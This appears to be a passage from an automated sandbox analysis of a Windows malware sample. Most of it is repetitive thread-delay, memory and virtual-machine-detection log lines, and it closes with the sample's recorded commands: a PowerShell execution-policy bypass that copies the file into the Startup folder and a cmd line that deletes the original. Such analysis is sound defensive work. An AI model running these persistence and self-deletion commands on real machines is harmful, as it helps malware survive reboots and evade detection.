            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeMemory allocated: 3020000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeMemory allocated: 3180000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeMemory allocated: 5180000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeMemory allocated: 820000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeMemory allocated: 2550000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeMemory allocated: AF0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeMemory allocated: 1490000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeMemory allocated: 2D10000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeMemory allocated: 4D10000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeMemory allocated: 12E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeMemory allocated: 2FF0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeMemory allocated: 2F30000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 599563Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 599438Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 599219Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 599094Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 598984Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 598875Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 598764Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 598656Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 598547Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 598437Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 598328Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 598218Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 598109Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 598000Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 597891Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 597766Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 597656Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 597547Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 597438Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 597313Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 597188Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 597063Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 596953Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 596844Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 596719Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 596609Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 596500Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 596390Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 596281Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 596172Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 596060Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 595953Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 595837Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 595728Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 595524Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 595393Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 595272Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 595156Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 595047Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 594937Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 594826Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 594717Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 594609Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 594500Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 594391Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 594281Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 594172Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1453Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1095Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeWindow / User API: threadDelayed 7617Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeWindow / User API: threadDelayed 2202Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3873Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1777Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 2440Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2288Thread sleep count: 1453 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4632Thread sleep count: 1095 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7232Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3916Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep count: 35 > 30Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -32281802128991695s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -599891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7376Thread sleep count: 7617 > 30Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7376Thread sleep count: 2202 > 30Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -599672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -599563s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -599438s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -599328s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -599219s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -599094s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -598984s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -598875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -598764s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -598656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -598547s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -598437s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -598328s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -598218s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -598109s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -598000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -597891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -597766s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -597656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -597547s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -597438s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -597313s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -597188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -597063s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -596953s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -596844s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -596719s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -596609s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -596500s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -596390s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -596281s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -596172s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -596060s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -595953s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -595837s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -595728s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -595524s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -595393s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -595272s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -595156s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -595047s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -594937s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -594826s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -594717s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -594609s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -594500s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -594391s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -594281s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exe TID: 7372Thread sleep time: -594172s >= -30000sJump to behavior
            Source: C:\Windows\System32\svchost.exe TID: 7188Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe TID: 7476Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7584Thread sleep count: 3873 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7572Thread sleep count: 1777 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7620Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7604Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 30000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 599563Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 599438Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 599219Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 599094Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 598984Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 598875Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 598764Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 598656Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 598547Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 598437Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 598328Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 598218Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 598109Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 598000Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 597891Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 597766Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 597656Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 597547Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 597438Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 597313Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 597188Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 597063Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 596953Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 596844Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 596719Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 596609Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 596500Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 596390Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 596281Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 596172Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 596060Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 595953Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 595837Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 595728Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 595524Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 595393Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 595272Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 595156Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 595047Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 594937Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 594826Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 594717Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 594609Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 594500Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 594391Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 594281Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeThread delayed: delay time: 594172Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeThread delayed: delay time: 30000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: upXUt2jZ0S.exe, .exe.2.drBinary or memory string: ResumeVirtualMachine
            Source: upXUt2jZ0S.exe, .exe.2.drBinary or memory string: InitializeVirtualMachine
            Source: upXUt2jZ0S.exe, 00000004.00000002.1560391567.0000000005D30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: .exe, 0000000A.00000002.1796684771.00000000013B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll;
            Source: upXUt2jZ0S.exe, 00000004.00000002.1549705639.0000000000886000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllM
            Source: svchost.exe, 00000005.00000002.2593915418.00000294CE854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2591225426.00000294C922B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2593762646.00000294CE841000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: upXUt2jZ0S.exe, .exe.2.drBinary or memory string: get_VirtualMachine
            Source: upXUt2jZ0S.exe, .exe.2.drBinary or memory string: get_MonoVirtualMachine
            Source: upXUt2jZ0S.exe, .exe.2.drBinary or memory string: VirtualMachineManager
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\upXUt2jZ0S.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe'
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\upXUt2jZ0S.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe'Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess created: C:\Users\user\Desktop\upXUt2jZ0S.exe "C:\Users\user\Desktop\upXUt2jZ0S.exe"Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\upXUt2jZ0S.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe'Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeQueries volume information: C:\Users\user\Desktop\upXUt2jZ0S.exe VolumeInformationJump to behavior
